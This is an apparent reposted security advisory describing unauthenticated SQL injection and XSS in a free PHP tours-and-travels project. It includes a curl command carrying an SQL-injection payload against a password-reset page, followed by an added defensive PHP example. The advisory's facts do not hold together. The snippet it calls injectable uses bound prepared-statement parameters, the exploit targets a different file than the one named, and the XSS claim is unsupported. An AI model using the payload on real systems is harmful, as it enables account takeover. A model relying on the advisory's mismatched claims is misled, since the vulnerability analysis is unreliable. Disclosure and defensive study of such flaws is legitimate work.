Tours and travels PHP Multiple Vulnerabilities
The PHP code of the online tours and travels project contains unauthenticated SQL injection and XSS vulnerabilities, concentrated in the `forgot-password.php` file. The SQL injection lets an attacker control database queries through crafted input, while the XSS lets an attacker inject script into the user interface. 2025-3-20 20:37:57 Author: cxsecurity.com

# Exploit Title: online-tours-travels-project Multiple Vulnerabilities
# Date: 23-02-2025
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-tours-travels-project-php/
# Software Link: https://github.com/projectworldsofficial/Tours-and-travels-in-php
# Description: The SQLi and the XSS are unauthenticated and in forgot-password.php
# Tested on: Ubuntu 24.04.2 LTS, XAMPP, Apache, MySQL

In this file: https://github.com/projectworldsofficial/Tours-and-travels-in-php/blob/master/forgot-password.php

[Unauthenticated SQL Injection]

When updating the password, the query is not sanitized or validated properly.

    $email=$_POST['email'];
    $mobile=$_POST['mobile'];
    $newpassword=md5($_POST['newpassword']);
    $sql ="SELECT EmailId FROM tblusers WHERE EmailId=:email and MobileNumber=:mobile";
    $query= $dbh -> prepare($sql);
    $query-> bindParam(':email', $email, PDO::PARAM_STR);
    $query-> bindParam(':mobile', $mobile, PDO::PARAM_STR);
    $query-> execute();
    $results = $query -> fetchAll(PDO::FETCH_OBJ);

Exploit:

    curl --location 'localhost/Tours-and-travels-in-php/reset-password.php' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode '[email protected]\'; -- ' \
    --data-urlencode 'mobile=1234567890' \
    --data-urlencode 'newpassword=newpassword'

[Cross Site Scripting]

An XSS vulnerability is present in the input fields email & mobile, where user input is reflected back in the output without proper encoding.
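The snippet quoted above binds the two lookup parameters but leaves the email and mobile fields unvalidated, reflects them unencoded, and stores the password as an unsalted md5. The handler below is an added example (not the project's code) showing the defensive shape a reset flow should have; it assumes `$dbh` is an existing PDO connection and that `tblusers` has a `Password` column (the advisory only shows the lookup query), and the 10-15 digit mobile rule is an assumed policy.

```php
<?php
// Added example, not the project's code. Assumes $dbh (PDO) exists and
// tblusers has EmailId, MobileNumber and Password (Password is assumed).

function validate_reset_input(array $post): ?array
{
    $email  = trim($post['email'] ?? '');
    $mobile = trim($post['mobile'] ?? '');
    $newpw  = $post['newpassword'] ?? '';
    // Reject malformed addresses early; the bound parameters below remain
    // the real SQL defence, validation just shrinks the input surface.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // Assumed policy: digits only, 10 to 15 of them.
    if (!preg_match('/^[0-9]{10,15}$/', $mobile) || strlen($newpw) < 8) {
        return null;
    }
    return ['email' => $email, 'mobile' => $mobile, 'newpassword' => $newpw];
}

function reset_password(PDO $dbh, array $in): bool
{
    // Bound parameters keep user data out of the SQL grammar entirely.
    $sql = 'UPDATE tblusers SET Password = :pw '
         . 'WHERE EmailId = :email AND MobileNumber = :mobile';
    $q = $dbh->prepare($sql);
    // password_hash() replaces the unsalted md5() used in the project.
    $q->bindValue(':pw', password_hash($in['newpassword'], PASSWORD_DEFAULT));
    $q->bindValue(':email', $in['email'], PDO::PARAM_STR);
    $q->bindValue(':mobile', $in['mobile'], PDO::PARAM_STR);
    $q->execute();
    return $q->rowCount() === 1;
}

// Every reflected value is HTML-encoded, which closes the XSS in the
// email and mobile fields regardless of what validation let through.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $in = validate_reset_input($_POST);
    if ($in === null) {
        echo '<p>Invalid input.</p>';
    } elseif (reset_password($dbh, $in)) {
        echo '<p>Password updated for ' . h($in['email']) . '</p>';
    } else {
        echo '<p>No account matches ' . h($in['email']) . ' / ' . h($in['mobile']) . '</p>';
    }
}
```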


Source: https://cxsecurity.com/issue/WLB-2025030020